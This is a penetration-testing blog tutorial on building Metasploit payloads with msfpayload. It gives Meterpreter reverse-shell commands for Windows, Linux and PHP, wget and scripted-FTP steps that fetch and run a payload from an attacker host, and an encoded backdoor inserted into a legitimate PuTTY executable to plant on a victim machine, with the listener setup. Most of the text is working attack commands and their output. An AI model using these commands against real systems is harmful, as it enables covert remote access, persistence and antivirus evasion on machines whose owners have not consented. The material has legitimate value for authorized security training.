backdoor

This edition of PrimalSec’s exploit tutorial series will cover how to make various payloads with msfpayload.  msfpayload is part of the Metasploit framework and allows us to generate Metasploit payloads into various formats.  In our previous blog posts, we leveraged msfpayload to generate raw shellcode that we leveraged in our buffer overflow for code execution.

Now we will go over some other use cases for msfpayload to generate some meterpreter payloads.  You will often find yourself wanting to upgrade your raw shell to a meterpreter shell because you have a lot of increased functionality, or you may want to backdoor a legit executable for persistence.

Create a Meterpeter payload to upgrade your raw shell:

# Windows Meterpreter Reverse Shell:
msfpayload windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > win_meter.exe

# Linux x86 Meterpreter Reverse Shell:
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> X > lin_meter.exe

# PHP Meterpreter Reverse Shell:
msfpayload php/meterpreter_reverse_tcp LHOST=<Attacker_IP> LPORT=<Listener_port> R > php_meter.php

Pull Over Binary on Linux:

To upgrade your raw shell to meterpreter you can follow this process for Linux:
Optional: Spawn a Pseudo-Terminal with Python

To create a python HTTP server the built-in function “SimpleHTTPServer” can be leveraged.  You can invoke a module directly from the command line with switch “-m”.  By default the listener will start on port 8000, but you can specify the port you’d like to use as an argument:

python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 80 ...

Now assuming you don’t have a firewall blocking connections you should be able to issue requests to the server.  You can place your meterpreter binary in the same directory that you started the Python HTTP server and it should be accessible by a remote client.  Here is an example of how you might want to leverage wget.  I find it very common in cases where you land an initial web shell that you don’t have permission to write in the current working directory, and you lack the ability to change directories.  So to solve the problem you can do the following:

# Switch -O allows you to output to another directory - /tmp/ is often writable
wget -O /tmp/<meterpeter_binary> http://<attacker_ip>/<meterpeter_binary>

# Change permissions
chmod a+x /tmp/<meterpeter_binary>

# Always a good idea to make sure the file pulled over properly
file /tmp/<meterpeter_binary>

# Run the meterpreter binary
/tmp/<meterpeter_binary>

 

Pull Over Binary on Windows:

To upgrade your raw shell to meterpreter on Windows you can do some CLI Kung Fu.  This helps you get around the issues with raw shell and not handling certain commands that require additional input:


# You can build up the FTP script line by line
# Don't spaces with username/passwords as they'll mess up authentication
C:>echo open [attacker_ip] >> ftp.txt

C:>echo [user]>>ftp.txt

C:>echo [password]>>ftp.txt

C:>echo get [meterpreter_binary]>>ftp.txt

C:>echo bye >> ftp.txt

Now you can leverage the built-in Windows FTP client with switch “-s” and use your FTP script file you created:

c:>ftp -s:ftp.txt
ftp.exe -s:ftp.txt
User ([attacker_ip]:(none)): open [attacker_ip]
get [meterpreter_binary]
bye

c:> dir /s | findstr [meterpreter_binary]

Now if you want to leverage msfpayload to backdoor a legitimate binary you can do the following:

~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=443 R | msfencode -t exe -x /tmp/putty.exe -k -o putty_bad.exe -e x86/shikata_ga_nai -c 3
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)

In this example we decided to backdoor PuTTY, but could have been any binary.  Switch “-t” specifies the output format,  “-x” specifies an alternate executable template to use, ” -o” specifies the output file, and switch “-e” the encoded to use.  Now we can plant the backdoored executable on the victim machine, start up an listener, and test it out:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.102:443
[*] Starting the payload handler...

Now assuming everything worked properly, when you click the PuTTY binary on the victim machine you should see your Meterpreter session spawn:
msfputty